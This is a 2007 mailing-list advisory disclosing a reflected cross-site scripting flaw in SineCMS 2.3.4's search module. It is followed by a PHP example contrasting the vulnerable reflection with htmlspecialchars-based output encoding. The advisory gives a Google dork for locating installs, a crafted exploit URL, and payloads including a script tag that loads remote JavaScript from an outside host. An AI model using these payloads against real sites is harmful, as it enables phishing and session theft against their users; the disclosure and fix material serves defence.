Network Security Vuln-Dev

SineCMS

Subject: SineCMS
Date: Thu, 26 Apr 2007 10:35:02 +0200
   .      .        .  
._ | _.  .|_  _. _.;_/
[_)|(_]\_|[ )(_](_.| \.net
|      ._|            
"SineCms Version 2.3.4 - Non-Persistent XSS Vulnerability"
        by Nexus

1) Infos
---------
Date            : 2007-04-26 (ISO 8601)
Product         : SineCms
Version         : 2.3.4 (latest), prior versions may also be affected
Vendor          : http://sourceforge.net/projects/sine - http://www.sinecms.net
Vendor Status   : 2007-04-26 - Informed!

Description     : SineCms is management software for international communication
                  based on hypertext.

Google Dork     : "SineCms Version: 2.3.4"

Source          : nexus
E-mail          : nexus[at]playhack[dot]net
Team            : Playhack.net Security


2) Security Issues
-------------------
The core Search module is affected by a Non-Persistent (reflected) Cross-Site
Scripting vulnerability.
The source in "mods/Core/result.php" doesn't properly sanitize user input: it
takes the submitted text as-is, without any prior check on its content, and
reflects it into the page.
The affected variable is $_GET['stringa']. If we submit a string like:
        "><script>alert(1);</script>
the website will produce a URL like:
        host/path/mods.php?mods=Core&page=result&stringa=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&campo=all&criterio=tutte&ordine=decrescente

And it executes the JavaScript code.
The script only checks for apostrophes (single quotes), which is easily avoided
because neither payload needs one; for example, a remote script can be loaded with:
        "><script src=http://host.com/script.js></script>

It's easy to see that this kind of vulnerability can be used to carry out
phishing attacks, or anything else that can be exploited through an XSS flaw.


3) Patch
---------

Edit the core source code and properly sanitize (encode for the HTML context) the submitted data before it is reflected into the page.
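The following is an added example, not SineCms's own code, which models the pattern the advisory describes (result.php reflecting $_GET['stringa'] after, at most, an apostrophe check) next to a hardened version that encodes on output. The function names render_vulnerable/render_fixed, the surrounding HTML, and the choice to model the apostrophe check as stripping single quotes are assumptions; the advisory does not say how that check is implemented.

```php
<?php
// Added example (not SineCms code). Models the advisory's result.php pattern:
// $_GET['stringa'] is reflected into the page with only an apostrophe check.
// Function names, HTML wrapper and the "strip apostrophes" model are assumptions.

// Vulnerable pattern: only single quotes ("apex") are handled, so a payload built
// from double quotes and angle brackets passes straight through into the markup.
function render_vulnerable(array $get): string
{
    $stringa = $get['stringa'] ?? '';
    // Assumed model of the apostrophe-only check described in the advisory.
    $stringa = str_replace("'", '', $stringa);
    return '<input type="text" name="stringa" value="' . $stringa . '">'
         . '<p>Results for: ' . $stringa . '</p>';
}

// Hardened pattern: encode for the HTML context at the point of output.
// ENT_QUOTES covers both quote characters, so the value cannot break out of
// the attribute; < and > are encoded, so no new tags can be introduced.
function render_fixed(array $get): string
{
    $stringa = $get['stringa'] ?? '';
    $safe = htmlspecialchars($stringa, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="stringa" value="' . $safe . '">'
         . '<p>Results for: ' . $safe . '</p>';
}

// Returns true if a live <script ...> tag survives in the rendered HTML.
function contains_script(string $html): bool
{
    return stripos($html, '<script') !== false;
}

// Constructed inputs mirroring the two payloads in the advisory; neither uses
// an apostrophe, which is why the original check does not stop them.
$payloads = [
    'inline' => '"><script>alert(1);</script>',
    'remote' => '"><script src=http://host.com/script.js></script>',
];

foreach ($payloads as $name => $p) {
    $get = [
        'stringa'  => $p,
        'campo'    => 'all',
        'criterio' => 'tutte',
        'ordine'   => 'decrescente',
    ];
    printf("%-6s vulnerable: %s\n", $name,
        contains_script(render_vulnerable($get)) ? 'script tag reaches the browser' : 'clean');
    printf("%-6s fixed:      %s\n", $name,
        contains_script(render_fixed($get)) ? 'script tag reaches the browser' : 'clean');
}
```

Run it with `php example.php`: both payloads survive render_vulnerable() and are neutralised by render_fixed(). The important design point is that the fix is context-specific output encoding, not input filtering: a blacklist of one character (or of the string "script") only invites the next bypass, whereas htmlspecialchars() with ENT_QUOTES makes every reflected character inert in both attribute and text contexts.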
